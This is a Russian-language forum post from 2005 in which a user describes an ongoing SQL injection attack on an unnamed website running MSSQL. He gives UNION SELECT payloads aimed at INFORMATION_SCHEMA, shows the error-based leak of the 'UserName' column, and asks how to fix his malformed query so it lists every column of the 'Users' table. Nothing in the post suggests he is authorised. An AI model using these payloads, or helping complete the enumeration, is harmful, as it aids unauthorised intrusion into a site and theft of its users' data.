Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Как узнать все имена столбцов в таблице (mssql) 15.08.05 21:34
Автор: chupakabra Статус: Незарегистрированный пользователь
|
Всем доброго времени суток.
В общем с помощью SQL инъекции на сайте узнал все имена таблиц. Далее запросом :
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users'
Получил
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserName' to a column of data type int.
Т.е. Первый столбец называется 'UserName'.
Далее делаю такой запрос:
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE%20TABLE_NAME='Users' WHERE%20COLUMN_NAME NOT IN (UserName)
На это сервер выдает:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'WHERE'.
Из-за этого неудается получить названия остальных столбцов. По этому у меня вопрос как правильно сформировать запрос, чтобы сервер выдал названия всех столбцов.
Заранее благодарен.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
